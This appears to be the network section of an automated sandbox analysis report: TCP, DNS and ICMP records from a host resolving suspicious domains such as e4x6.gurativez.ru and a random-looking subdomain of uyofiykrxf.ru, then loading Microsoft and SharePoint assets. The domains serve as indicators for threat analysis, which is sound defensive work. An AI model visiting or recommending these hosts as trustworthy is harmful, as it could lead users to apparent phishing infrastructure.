                                                                                              Dec 19, 2024 14:36:24.099401951 CET44349843172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:24.099471092 CET49843443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:24.099749088 CET49843443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:24.099786043 CET44349843172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:25.318972111 CET44349843172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:25.319586992 CET49843443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:25.319653988 CET44349843172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:25.321122885 CET44349843172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:25.321212053 CET49843443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:25.321584940 CET49843443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:25.321680069 CET44349843172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:25.321800947 CET49843443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:25.321822882 CET44349843172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:25.374937057 CET49843443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:26.190807104 CET44349843172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:26.190947056 CET44349843172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:26.191015959 CET49843443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:26.192082882 CET49843443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:26.192106009 CET44349843172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:28.648312092 CET49858443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:28.648334980 CET4434985820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:28.648423910 CET49858443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:28.648886919 CET49858443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:28.648904085 CET4434985820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:30.881540060 CET4434985820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:30.881659985 CET49858443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:30.888340950 CET49858443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:30.888375998 CET4434985820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:30.889168978 CET4434985820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:30.891222000 CET49858443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:30.891275883 CET49858443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:30.891402006 CET49858443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:30.891412020 CET4434985820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:30.939353943 CET4434985820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:31.553092957 CET4434985820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:31.553309917 CET4434985820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:31.553379059 CET49858443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:31.553683996 CET49858443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:31.553699970 CET4434985820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:47.030047894 CET49919443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:47.030093908 CET4434991920.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:47.030165911 CET49919443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:47.030781031 CET49919443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:47.030817986 CET4434991920.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:49.252576113 CET4434991920.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:49.252724886 CET49919443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:49.254554987 CET49919443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:49.254585981 CET4434991920.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:49.254852057 CET4434991920.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:49.256752014 CET49919443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:49.256829977 CET49919443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:49.256858110 CET4434991920.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:49.256954908 CET49919443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:49.299333096 CET4434991920.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:49.800051928 CET4434991920.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:49.800188065 CET4434991920.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:49.800297022 CET49919443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:49.800636053 CET49919443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:49.800699949 CET4434991920.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:49.906568050 CET49925443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:36:49.906624079 CET44349925142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:49.906732082 CET49925443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:36:49.906985044 CET49925443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:36:49.907000065 CET44349925142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:51.599365950 CET44349925142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:51.599760056 CET49925443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:36:51.599800110 CET44349925142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:51.600286961 CET44349925142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:51.600585938 CET49925443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:36:51.600673914 CET44349925142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:51.654493093 CET49925443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:37:01.294147968 CET44349925142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:37:01.294213057 CET44349925142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:37:01.294272900 CET49925443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:37:02.219803095 CET49925443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:37:02.219851971 CET44349925142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:37:14.695048094 CET49986443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:14.695092916 CET4434998620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:14.695200920 CET49986443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:14.695980072 CET49986443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:14.696000099 CET4434998620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:16.925834894 CET4434998620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:16.925934076 CET49986443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:16.928366899 CET49986443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:16.928385019 CET4434998620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:16.928602934 CET4434998620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:16.930800915 CET49986443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:16.930887938 CET49986443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:16.930900097 CET4434998620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:16.931061983 CET49986443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:16.971323013 CET4434998620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:17.489083052 CET4434998620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:17.489200115 CET4434998620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:17.489280939 CET49986443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:17.489430904 CET49986443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:17.489470005 CET4434998620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:17.717314959 CET49701443192.168.2.640.126.53.12
                                                                                              Dec 19, 2024 14:37:17.838099957 CET4434970140.126.53.12192.168.2.6
                                                                                              Dec 19, 2024 14:37:17.838392019 CET49701443192.168.2.640.126.53.12
                                                                                              Dec 19, 2024 14:37:23.295355082 CET49705443192.168.2.640.126.53.12
                                                                                              Dec 19, 2024 14:37:23.415635109 CET4434970540.126.53.12192.168.2.6
                                                                                              Dec 19, 2024 14:37:23.415684938 CET49705443192.168.2.640.126.53.12
                                                                                              Dec 19, 2024 14:37:49.522547007 CET50064443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:49.522645950 CET4435006420.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:49.522733927 CET50064443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:49.523354053 CET50064443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:49.523382902 CET4435006420.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:49.967807055 CET50065443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:37:49.967925072 CET44350065142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:37:49.968039989 CET50065443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:37:49.968255043 CET50065443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:37:49.968285084 CET44350065142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:37:51.672451973 CET44350065142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:37:51.672852993 CET50065443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:37:51.672921896 CET44350065142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:37:51.674032927 CET44350065142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:37:51.674339056 CET50065443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:37:51.674519062 CET44350065142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:37:51.717344046 CET50065443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:37:51.762768030 CET4435006420.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:51.762859106 CET50064443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:51.765067101 CET50064443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:51.765089035 CET4435006420.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:51.765978098 CET4435006420.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:51.767657042 CET50064443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:51.767714024 CET50064443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:51.767728090 CET4435006420.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:51.767846107 CET50064443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:51.811338902 CET4435006420.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:52.429538965 CET4435006420.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:52.429707050 CET4435006420.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:37:52.429789066 CET50064443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:52.429966927 CET50064443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:37:52.430011988 CET4435006420.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:38:01.365545034 CET44350065142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:38:01.365703106 CET44350065142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:38:01.365783930 CET50065443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:38:02.219424963 CET50065443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:38:02.219518900 CET44350065142.250.181.132192.168.2.6
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 19, 2024 14:35:46.031857014 CET5625353192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:46.032004118 CET5891453192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:46.161745071 CET53557121.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:46.167830944 CET53499311.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:46.406903028 CET53589141.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:46.406939983 CET53562531.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.145320892 CET6000453192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:48.145457983 CET5990953192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:48.149674892 CET5348153192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:48.150100946 CET5279353192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:48.282445908 CET53599091.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.283260107 CET53600041.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.288491011 CET53534811.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.291484118 CET53527931.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.887511969 CET53546541.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.843957901 CET4959453192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:49.844146967 CET5826553192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:49.981079102 CET53495941.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.981906891 CET53582651.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.418617010 CET5150353192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:50.418768883 CET4920453192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:50.449923992 CET53562301.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.497663975 CET5007253192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:50.497955084 CET6337353192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:50.555908918 CET53515031.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.555951118 CET53492041.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.918523073 CET53633731.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.918546915 CET53500721.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.922832966 CET6312853192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:50.923029900 CET5596053192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:51.060631037 CET53631281.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.060992002 CET53559601.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.756599903 CET5904653192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:54.756906986 CET5235853192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:54.758089066 CET5274253192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:54.758542061 CET5678353192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:54.759208918 CET5452053192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:54.759716034 CET6313653192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:54.895520926 CET53590461.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.895646095 CET53523581.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.896619081 CET53527421.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.896661997 CET53567831.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.897116899 CET53545201.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.897135973 CET53631361.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:57.085453033 CET4962453192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:57.085591078 CET5672553192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:57.222668886 CET53567251.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:57.223043919 CET53496241.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.620884895 CET5725153192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:58.621038914 CET6366953192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:58.629805088 CET5210653192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:58.630013943 CET5644953192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:35:58.758029938 CET53572511.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.758356094 CET53636691.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.766565084 CET53521061.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.766669035 CET53564491.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.938882113 CET53586891.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:06.246777058 CET5512353192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:06.246927977 CET5595953192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:06.384018898 CET53559591.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:06.384032965 CET53551231.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:19.004909992 CET5622653192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:19.005366087 CET6459953192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:19.402709007 CET53562261.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:19.402884007 CET53645991.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:22.729841948 CET6476453192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:22.730001926 CET6470953192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:22.744026899 CET5809253192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:22.744215012 CET5196253192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:22.881674051 CET53519621.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:22.882740021 CET53580921.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:23.225452900 CET53647091.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:25.104096889 CET53572741.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:29.229685068 CET6411953192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:29.229850054 CET6151053192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:29.231713057 CET5830453192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:29.231853962 CET5032153192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:32.103763103 CET5933353192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:32.103900909 CET5807853192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:33.043623924 CET5492453192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:33.043755054 CET6323653192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:35.371236086 CET5706253192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:35.371392012 CET5924653192.168.2.61.1.1.1
                                                                                              Dec 19, 2024 14:36:45.623186111 CET53547231.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:47.389142036 CET53534021.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:37:17.840679884 CET53585641.1.1.1192.168.2.6
                                                                                              Dec 19, 2024 14:38:05.013328075 CET53615861.1.1.1192.168.2.6
                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                              Dec 19, 2024 14:36:29.812053919 CET192.168.2.61.1.1.1c2a3(Port unreachable)Destination Unreachable
                                                                                              Dec 19, 2024 14:36:32.104659081 CET192.168.2.61.1.1.1c265(Port unreachable)Destination Unreachable
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 19, 2024 14:35:46.031857014 CET192.168.2.61.1.1.10x650aStandard query (0)alternative-magic.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:46.032004118 CET192.168.2.61.1.1.10x6822Standard query (0)alternative-magic.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:48.145320892 CET192.168.2.61.1.1.10xac58Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:48.145457983 CET192.168.2.61.1.1.10xac5Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:48.149674892 CET192.168.2.61.1.1.10x6c48Standard query (0)alternative-magic.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:48.150100946 CET192.168.2.61.1.1.10xf1d5Standard query (0)alternative-magic.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:49.843957901 CET192.168.2.61.1.1.10xcf83Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:49.844146967 CET192.168.2.61.1.1.10x5205Standard query (0)www.google.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:50.418617010 CET192.168.2.61.1.1.10xeebfStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:50.418768883 CET192.168.2.61.1.1.10x1be2Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:50.497663975 CET192.168.2.61.1.1.10x1802Standard query (0)e4x6.gurativez.ruA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:50.497955084 CET192.168.2.61.1.1.10x5ce9Standard query (0)e4x6.gurativez.ru65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:50.922832966 CET192.168.2.61.1.1.10x922Standard query (0)e4x6.gurativez.ruA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:50.923029900 CET192.168.2.61.1.1.10x5d04Standard query (0)e4x6.gurativez.ru65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.756599903 CET192.168.2.61.1.1.10x885cStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.756906986 CET192.168.2.61.1.1.10x4945Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.758089066 CET192.168.2.61.1.1.10x2f2eStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.758542061 CET192.168.2.61.1.1.10xa837Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.759208918 CET192.168.2.61.1.1.10xd86dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.759716034 CET192.168.2.61.1.1.10x187aStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:57.085453033 CET192.168.2.61.1.1.10x3863Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:57.085591078 CET192.168.2.61.1.1.10x1e46Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:58.620884895 CET192.168.2.61.1.1.10xc131Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:58.621038914 CET192.168.2.61.1.1.10x6830Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:58.629805088 CET192.168.2.61.1.1.10xd75dStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:58.630013943 CET192.168.2.61.1.1.10xa752Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:06.246777058 CET192.168.2.61.1.1.10x9e00Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:06.246927977 CET192.168.2.61.1.1.10xb8c5Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:19.004909992 CET192.168.2.61.1.1.10x10aeStandard query (0)9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ruA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:19.005366087 CET192.168.2.61.1.1.10xad2eStandard query (0)9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru65IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:22.729841948 CET192.168.2.61.1.1.10x7139Standard query (0)www.sharepoint.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:22.730001926 CET192.168.2.61.1.1.10x7d2cStandard query (0)www.sharepoint.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:22.744026899 CET192.168.2.61.1.1.10x5a0fStandard query (0)9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ruA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:22.744215012 CET192.168.2.61.1.1.10xbaf3Standard query (0)9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru65IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:29.229685068 CET192.168.2.61.1.1.10xfabeStandard query (0)assets.onestore.msA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:29.229850054 CET192.168.2.61.1.1.10x8d30Standard query (0)assets.onestore.ms65IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:29.231713057 CET192.168.2.61.1.1.10xe310Standard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:29.231853962 CET192.168.2.61.1.1.10x5f9bStandard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:32.103763103 CET192.168.2.61.1.1.10x817Standard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:32.103900909 CET192.168.2.61.1.1.10x7bbfStandard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:33.043623924 CET192.168.2.61.1.1.10x97a1Standard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:33.043755054 CET192.168.2.61.1.1.10x566eStandard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:35.371236086 CET192.168.2.61.1.1.10xbe4fStandard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:35.371392012 CET192.168.2.61.1.1.10xa961Standard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 19, 2024 14:35:46.406939983 CET1.1.1.1192.168.2.60x650aNo error (0)alternative-magic.com69.49.245.172A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:48.282445908 CET1.1.1.1192.168.2.60xac5No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:48.283260107 CET1.1.1.1192.168.2.60xac58No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:48.283260107 CET1.1.1.1192.168.2.60xac58No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:48.288491011 CET1.1.1.1192.168.2.60x6c48No error (0)alternative-magic.com69.49.245.172A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:49.981079102 CET1.1.1.1192.168.2.60xcf83No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:49.981906891 CET1.1.1.1192.168.2.60x5205No error (0)www.google.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:50.555908918 CET1.1.1.1192.168.2.60xeebfNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:50.555908918 CET1.1.1.1192.168.2.60xeebfNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:50.555951118 CET1.1.1.1192.168.2.60x1be2No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:50.918523073 CET1.1.1.1192.168.2.60x5ce9No error (0)e4x6.gurativez.ru65IN (0x0001)false
